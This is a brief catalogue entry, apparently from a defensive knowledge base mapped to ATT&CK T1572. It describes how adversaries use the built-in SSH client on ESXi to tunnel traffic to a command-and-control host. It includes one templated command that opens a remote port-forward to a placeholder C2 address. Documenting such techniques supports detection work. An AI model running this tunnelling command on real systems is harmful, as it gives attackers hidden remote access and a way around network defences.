Inbuilt SSH client used to remote port-forward using a tunnel.
Resources:
Acknowledgements:
- Ren Jie Yow
- Zhongyuan Hau (Aaron)
Tunnel traffic
-
SSH client used to create a tunnel.
ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
- Use case
- An adversary uses the native SSH binary to create a tunnel to remote port-forwarding to their C2 host.
- Privileges required
- User
- Operating systems
- ESXi
- Additional Procedural Examples
-
- ATT&CK® technique
- T1572